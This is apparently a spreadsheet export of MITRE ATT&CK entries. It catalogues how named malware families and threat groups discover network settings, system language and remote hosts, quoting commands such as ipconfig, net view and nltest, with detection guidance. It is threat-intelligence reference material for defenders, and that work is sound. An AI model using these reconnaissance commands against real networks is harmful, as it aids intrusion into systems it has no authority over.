[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about network IP configurations using [ipconfig](https://attack.mitre.org/software/S0100).exe and about routing tables using [route](https://attack.mitre.org/software/S0103).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) can collect the victim's MAC address by using the &lt;code&gt;GetAdaptersInfo&lt;/code&gt; API.(Citation: Checkpoint IndigoZebra July 2021)
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) gathers network configuration information as well as the ARP cache.(Citation: McAfee Gold Dragon)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) runs the &lt;code&gt;ifconfig&lt;/code&gt; command to obtain the IP address from the victim’s machine.(Citation: Securelist Calisto July 2018)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) can collect the IP address of the victims and other computers on the network using the commands: &lt;code&gt;ipconfig -all&lt;/code&gt; &lt;code&gt;nbtstat -n&lt;/code&gt;, and &lt;code&gt;nbtstat -s&lt;/code&gt;.(Citation: ESET Carbon Mar 2017)(Citation: GovCERT Carbon May 2016)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) gathers the Mac address, IP address, and the network adapter information from the victim’s machine.(Citation: Symantec Catchamas April 2018)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather the IP address from the victim's machine using the IP config command.(Citation: ClearSky Lebanese Cedar Jan 2021) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) has the ability to use &lt;code&gt;ipconfig&lt;/code&gt; to enumerate system network settings.(Citation: Check Point APT35 CharmPower January 2022)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can enumerate the IP address of a compromised host.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can enumerate the IP address of a compromised machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the NetBios name and  the IP addresses of targets machines including domain controllers.(Citation: Cyberreason Anchor December 2019)(Citation: Cobalt Strike Manual 4.3 November 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses &lt;code&gt;ipconfig /all&lt;/code&gt; and &lt;code&gt;route PRINT&lt;/code&gt; to identify network adapter and interface information.(Citation: Palo Alto Comnie)
Conti
[Conti](https://attack.mitre.org/software/S0575) can retrieve the ARP cache from the local system by using the &lt;code&gt;GetIpNetTable()&lt;/code&gt; API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.(Citation: CarbonBlack Conti July 2020) 
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can use `getmac` and `Get-NetIPAddress` to enumerate network settings.(Citation: Microsoft POLONIUM June 2022)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim MAC address and LAN IP.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can retrieve the ARP cache from the local system by using &lt;code&gt;GetIpNetTable&lt;/code&gt;.(Citation: McAfee Cuba April 2021) 
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `if_nameindex` to gather network interface names.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can discover the DNS domain name of a targeted system.(Citation: Mandiant APT41)
Denis
[Denis](https://attack.mitre.org/software/S0354) uses &lt;code&gt;ipconfig&lt;/code&gt; to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can enumerate victims' local and external IPs when registering with C2.(Citation: Fortinet Diavol July 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can collect the host's IP addresses using the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
Duqu
The reconnaissance modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network configuration.(Citation: Symantec W32.Duqu)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) can determine the domain of a compromised host.(Citation: IBM Ransomware Trends September 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)
Empire
[Empire](https://attack.mitre.org/software/S0363) can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;nbtstat -n&lt;/code&gt; and &lt;code&gt;nbtstat -s&lt;/code&gt; commands on the victim’s machine.(Citation: Kaspersky Turla)
Explosive
 [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) 
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) collects MAC address and local IP address information from the victim.(Citation: US-CERT FALLCHILL Nov 2017)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) collects information about the network including the IP address and DHCP server.(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) collects the victim LAN IP address and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;ipconfig /all&lt;/code&gt; command on a victim system.(Citation: NTT Security Flagpro new December 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can parse the `ProxyServer` string in the Registry to discover http proxies.(Citation: Bitdefender FunnyDream Campaign November 2020)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on network settings and Internet proxy settings from the victim.(Citation: F-Secure The Dukes)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) retrieved a list of the system's network interface after execution.(Citation: MSTIC NOBELIUM Mar 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the IP and physical location of the compromised host via IPinfo.(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim IP address, MAC address, as well as the victim account domain name.(Citation: Talos GravityRAT)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can obtain proxy information from a victim's machine using system environment variables.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can enumerate the IP and domain of a target system.(Citation: Group IB GrimAgent July 2021)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
IceApple
The [IceApple](https://attack.mitre.org/software/S1022) [ifconfig](https://attack.mitre.org/software/S0101) module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.(Citation: CrowdStrike IceApple May 2022)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604)’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.(Citation: ESET Industroyer)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) enumerates the IP address, network proxy settings, and domain name from a victim's system.(Citation: Trend Micro IXESHE 2012)
JHUHUGIT
A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers network interface card information.(Citation: Unit 42 Playbook Dec 2017)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can obtain network information, including DNS, IP, and proxies.(Citation: Microsoft PLATINUM April 2016)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) gathers the MAC address of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) can collect the IP address from the victim’s machine.(Citation: Talos Konni May 2017)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [Arp](https://attack.mitre.org/software/S0099) to discover a target's network configuration setttings.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) gathers information about network adapters.(Citation: Unit 42 Kazuar May 2017)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can collect the MAC address and other information from a victim machine using `ipconfig/all`.(Citation: Kaspersky Lyceum October 2021)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) can determine the public or WAN IP address for the system.(Citation: PWC KeyBoys Feb 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can retrieve the contents of the IP routing table as well as information about the Windows domain.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can record the IP address of the target machine.(Citation: ESET Kobalos Jan 2021)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects network adapter and interface information by using the commands &lt;code&gt;ipconfig /all&lt;/code&gt;, &lt;code&gt;arp -a&lt;/code&gt; and &lt;code&gt;route print&lt;/code&gt;. It also collects the system's MAC address with &lt;code&gt;getmac&lt;/code&gt; and domain configuration with &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) gathers information about network adapters using the Win32 API call &lt;code&gt;GetAdaptersInfo&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to discover the proxy configuration of Firefox and/or Opera.(Citation: ESET Dukes October 2019)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can retrieve network information from a compromised host.(Citation: BiZone Lizar May 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can collect the IP address of a compromised host.(Citation: Unit 42 Lucifer June 2020)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can collect IP addresses from a compromised host.(Citation: ESET DazzleSpy Jan 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409) collects the MAC address of the target computer and other network configuration information.(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use the `GetAdaptersInfo` function to retrieve information about network adapters and the `GetIpNetTable` function to retrieve the IPv4 to physical network address mapping table.(Citation: SentinelLabs Metador Sept 2022)
Milan
[Milan](https://attack.mitre.org/software/S1015) can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2&gt;&amp;1` to discover network settings.(Citation: ClearSky Siamesekitten August 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.(Citation: Cylance Dust Storm)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim IP address.(Citation: Palo Alto MoonWind March 2017)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the IP address from the victim's machine.(Citation: Talos Cobalt Group July 2018)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) uses the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: ESET Turla Mosquito Jan 2018)
NBTscan
[NBTscan](https://attack.mitre.org/software/S0590) can be used to collect MAC addresses.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can collect the IP address of a compromised host.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) can gather information on the victim IP address.(Citation: Unit 42 NOKKI Sept 2018)
Naid
[Naid](https://attack.mitre.org/software/S0205) collects the domain name from a compromised host.(Citation: Symantec Naid June 2012)
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) can gather information about the victim proxy server.(Citation: Proofpoint Leviathan Oct 2017)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) gathers the IP address from the victim’s machine.(Citation: DigiTrust NanoCore Jan 2017)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can gather the IP address from an infected host.(Citation: Microsoft NICKEL December 2021)  
Nltest
[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate the parent domain of a local machine using &lt;code&gt;/parentdomain&lt;/code&gt;.(Citation: Nltest Manual)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) discovers the current domain information.(Citation: Symantec Buckeye)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can collect the network interface MAC address on the infected host.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)
OceanSalt
[OceanSalt](https://attack.mitre.org/software/S0346) can collect the victim’s IP address.(Citation: McAfee Oceansalt Oct 2018)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) can collect the host IP address from the victim’s machine.(Citation: Securelist Octopus Oct 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses API calls to enumerate the infected system's ARP table.(Citation: Talos Olympic Destroyer 2018)
Orz
[Orz](https://attack.mitre.org/software/S0229) can gather victim proxy information.(Citation: Proofpoint Leviathan Oct 2017)
PLAINTEE
[P</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
OS API Execution
Monitor for API calls that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Process Creation
Monitor for newly executed processes that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Windows Registry Key Access
Monitor for access to windows registry keys that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.(Citation: ClearSky Lazarus Aug 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants to collect the system language ID of a compromised machine.(Citation: Microsoft NICKEL December 2021)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities.(Citation: Arxiv Avaddon Feb 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.(Citation: NCC Group Team9 June 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the &lt;code&gt;GetTextCharset&lt;/code&gt; function.(Citation: Mcafee Clop Aug 2019) 
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can check if Russian language is installed on the infected machine by using the function &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt;.(Citation: McAfee Cuba April 2021) 
DEATHRANSOM
Some versions of [DEATHRANSOM](https://attack.mitre.org/software/S0616) have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar [DEATHRANSOM](https://attack.mitre.org/software/S0616) would exit.(Citation: FireEye FiveHands April 2021)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: BleepingComputer Molerats Dec 2020)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.(Citation: NTT Security Flagpro new December 2021) 
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has used &lt;code&gt;Accept-Language&lt;/code&gt; to identify hosts in the United Kingdom, United States, France, and Spain.(Citation: Group IB GrimAgent July 2021) 
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can use the &lt;code&gt;GetKeyboardLayout&lt;/code&gt; API to check if a compromised host's keyboard is set to Persian.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Maze
[Maze](https://attack.mitre.org/software/S0449) has checked the language of the machine with function &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt; and terminated execution if the language matches with an entry in the predefined list.(Citation: McAfee Maze March 2020)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.(Citation: Cylance Dust Storm)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can identify the system language on a compromised host.(Citation: Microsoft NICKEL December 2021)
REvil
[REvil](https://attack.mitre.org/software/S0496) can check the system language using &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt; and &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;. If the language is found in the list, the process terminates.(Citation: Kaspersky Sodin July 2019)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has been observed to query the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; and the value &lt;code&gt;InstallLanguage&lt;/code&gt;. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution.(Citation: CrowdStrike Ryuk January 2019)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.(Citation: Cylance Dust Storm)
SharpStage
[SharpStage](https://attack.mitre.org/software/S0546)  has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.(Citation: BleepingComputer Molerats Dec 2020)
Spark
[Spark](https://attack.mitre.org/software/S0543) has checked the results of the &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and the language name returned by &lt;code&gt;GetLocaleInfoA&lt;/code&gt; to make sure they contain the word “Arabic” before executing.(Citation: Unit42 Molerat Mar 2020)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) lists all the keyboard layouts installed on the victim’s system using &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; API and checks against a hardcoded language code list. If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.(Citation: SecureList SynAck Doppelgänging May 2018) 
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses AppleScript to check the host's language and location with the command &lt;code&gt;user locale of (get system info)&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.(Citation: Talos Zeus Panda Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
Windows PowerShell log Event ID 4104 (PS script execution) can be used to capture PowerShell script block contents which may contain commands used as a precursor to [RDP Hijacking](https://attack.mitre.org/techniques/T1563/002). For example, the following command in a PowerShell script block may be used to enumerate the systems on a network which have RDP access: &lt;code&gt;Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName&lt;/code&gt;. 
File Access
Monitor for files (such as &lt;code&gt;/etc/hosts&lt;/code&gt;) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.
For Windows, Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on access attempts of local files that store host data, including C:\Windows\System32\Drivers\etc\hosts.
For Linux, auditing frameworks such as the audit daemon (auditd) can be used to alert on access attempts of local files that store host data, including /etc/hosts.
Network Connection Creation
Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.
Process Creation
Monitor for newly executed processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) remotely discovered systems over LAN connections. OT systems were visible from the IT network   as well, giving adversaries the ability to discover operational assets. (Citation: Charles McLellan March 2016)
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) checked for connectivity to resources within the network and used LDAP to query Active Directory, discovering information about computers listed in AD.(Citation: Dragos Crashoverride 2018)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.(Citation: DFIR Conti Bazar Nov 2021)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used several tools and batch files to map victims' internal networks.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used [AdFind](https://attack.mitre.org/software/S0552) to enumerate remote systems.(Citation: Microsoft Deep Dive Solorigate January 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can detect the existence of remote systems.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has enumerated DC servers using the command &lt;code&gt;net group "Domain Controllers" /domain&lt;/code&gt;. The group has also used the &lt;code&gt;ping&lt;/code&gt; command.(Citation: Cybereason Cobalt Kitty 2017)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used [NBTscan](https://attack.mitre.org/software/S0590) and custom tools to discover remote systems.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) typically use &lt;code&gt;ping&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039) to enumerate systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has utilized various scans and queries to find domain controllers and remote services in the target environment.(Citation: NCC Group Chimera January 2021)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has used ping to identify other machines of interest.(Citation: Alperovitch 2014)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has likely obtained a list of hosts in the victim environment.(Citation: US-CERT TA18-074A)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -
property * | findstr “Address””&lt;/code&gt; to find the network information of successfully logged-in accounts to discovery addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has used the open source tool Essential NetTools to map the network and build a list of targets.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.(Citation: FireEye FIN6 April 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used [dsquery](https://attack.mitre.org/software/S0105) and other Active Directory utilities to enumerate hosts; they have also used &lt;code&gt;nltest.exe /dclist&lt;/code&gt; to retrieve a list of domain controllers.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Bitdefender FIN8 July 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Angry IP Scanner to detect remote systems.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [NBTscan](https://attack.mitre.org/software/S0590) to identify available NetBIOS name servers over the network as well as &lt;code&gt;ping&lt;/code&gt; to identify remote systems.(Citation: Cybereason Soft Cell June 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has enumerated domain controllers using `net group "Domain computers"` and `nltest /dclist`.(Citation: Rapid7 HAFNIUM Mar 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used `net view` to enumerate domain machines.(Citation: Kaspersky Lyceum October 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.(Citation: Symantec WastedLocker June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used network scanning and enumeration tools, including [Ping](https://attack.mitre.org/software/S0097).(Citation: NCC Group APT15 Alive and Strong)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used Microsoft’s Sysinternals tools to gather detailed information about remote systems.(Citation: Symantec Leafminer July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used [Ping](https://attack.mitre.org/software/S0097) for discovery on targeted networks.(Citation: DFIR Phosphorus November 2021)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used a netbios scanner for remote machine identification.(Citation: Bitdefender Naikon April 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.(Citation: Talos Rocke August 2018)	
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.(Citation: ESET Telebots Dec 2016)(Citation: Dragos Crashoverride 2018) 
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.(Citation: Group IB Silence Sept 2018)	
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Nccgroup Emissary Panda May 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the &lt;code&gt;net view&lt;/code&gt; and &lt;code&gt;net view /DOMAIN&lt;/code&gt; commands. [Turla](https://attack.mitre.org/groups/G0010) has also used &lt;code&gt;net group "Domain Computers" /domain&lt;/code&gt;, &lt;code&gt;net group "Domain Controllers" /domain&lt;/code&gt;, and &lt;code&gt;net group "Exchange Servers" /domain&lt;/code&gt; to enumerate domain computers, including the organization's DC and Exchange Server.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used multiple methods, including [Ping](https://attack.mitre.org/software/S0097), to enumerate systems on compromised networks.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
